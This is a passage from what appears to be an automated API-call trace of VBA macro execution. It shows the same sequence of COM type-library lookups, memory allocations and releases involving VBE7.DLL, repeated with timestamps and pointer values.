invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.557] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb39d0 [0060.557] _mbscpy_s (in: _Dst=0x1d39dbb39d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb39d0) returned 0x0 [0060.557] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.557] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.557] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.558] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.558] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.558] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.558] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.558] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb39d0) [0060.558] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.558] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.558] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.558] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.558] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.558] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.558] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.558] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3af0 [0060.558] _mbscpy_s (in: _Dst=0x1d39dbb3af0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3af0) returned 0x0 [0060.558] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.558] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.558] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.558] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.558] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.558] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.558] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.558] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3af0) [0060.558] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.558] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.558] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.558] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.558] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.559] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.559] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.559] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3830 [0060.559] _mbscpy_s (in: _Dst=0x1d39dbb3830, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3830) returned 0x0 [0060.559] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.559] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.559] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.559] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.559] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.559] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.559] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.559] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3830) [0060.559] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.559] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.559] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.559] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.559] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.559] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.559] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.559] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3bf0 [0060.559] _mbscpy_s (in: _Dst=0x1d39dbb3bf0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3bf0) returned 0x0 [0060.559] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.559] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.559] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.559] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.559] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.559] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.559] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.559] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3bf0) [0060.560] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.560] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.560] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.560] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.560] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.560] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.560] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.560] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3c30 [0060.560] _mbscpy_s (in: _Dst=0x1d39dbb3c30, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3c30) returned 0x0 [0060.560] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.560] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.560] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.560] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.560] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.560] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.560] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.560] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3c30) [0060.560] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.560] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.560] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.560] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.560] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.560] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.560] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.560] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3770 [0060.561] _mbscpy_s (in: _Dst=0x1d39dbb3770, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3770) returned 0x0 [0060.561] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.561] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.561] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.561] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.561] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.561] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.561] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.561] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3770) [0060.561] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.561] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.562] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.562] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.562] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.562] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.562] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.562] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3890 [0060.562] _mbscpy_s (in: _Dst=0x1d39dbb3890, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3890) returned 0x0 [0060.562] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.562] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.562] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.562] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.562] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.562] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.562] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.562] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3890) [0060.562] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.562] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.562] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.562] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.562] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.562] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.562] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.562] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3d90 [0060.562] _mbscpy_s (in: _Dst=0x1d39dbb3d90, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3d90) returned 0x0 [0060.562] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.562] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.563] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.563] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.563] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.563] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.563] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.563] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3d90) [0060.563] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.563] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.563] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.563] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.563] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.563] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.563] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.563] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3e30 [0060.563] _mbscpy_s (in: _Dst=0x1d39dbb3e30, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3e30) returned 0x0 [0060.563] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.563] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.563] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.563] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.563] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.563] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, 